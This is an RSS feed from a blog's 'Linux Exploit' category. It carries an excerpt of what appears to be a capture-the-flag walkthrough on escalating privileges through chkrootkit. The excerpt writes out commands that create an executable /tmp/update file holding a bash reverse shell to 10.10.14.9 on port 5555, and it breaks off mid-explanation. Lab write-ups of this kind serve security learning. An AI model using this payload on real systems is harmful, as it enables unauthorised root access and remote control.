<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Linux Exploit on rchitect</title><link>https://www.rchitect.in/categories/linux-exploit/</link><description>Recent content in Linux Exploit on rchitect</description><generator>Hugo</generator><language>en</language><lastBuildDate>Wed, 09 Mar 2022 00:00:00 +0000</lastBuildDate><atom:link href="https://www.rchitect.in/categories/linux-exploit/index.xml" rel="self" type="application/rss+xml"/><item><title>chkrootkit exploit for privilege esclation</title><link>https://www.rchitect.in/posts/chk-rootkit/</link><pubDate>Wed, 09 Mar 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/chk-rootkit/</guid><description>&lt;h1 id="chkrootkit-exploit"&gt;
 Chkrootkit Exploit
 &lt;a class="heading-link" href="#chkrootkit-exploit"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;I have tried pspy and i could see the chkrootkit&lt;/p&gt;
&lt;p&gt;Lets search for the exploit&lt;/p&gt;
&lt;p&gt;As per this exploit if you create any exploit ,if you create a file named &amp;ldquo;update&amp;rdquo; under /tmp.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;amrois@nineveh:/tmp$ printf &amp;#39;#!/bin/sh\n&amp;#39; &amp;gt; update
amrois@nineveh:/tmp$ printf &amp;#39;/bin/bash -c &amp;#34;/bin/bash -i &amp;gt; /dev/tcp/10.10.14.9/5555 0&amp;lt;&amp;amp;1&amp;#34;\n&amp;#39; &amp;gt;&amp;gt; update
amrois@nineveh:/tmp$ chmod +x update 
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Or You can use EOF to repalce printf command like below&lt;/p&gt;</description></item></channel></rss>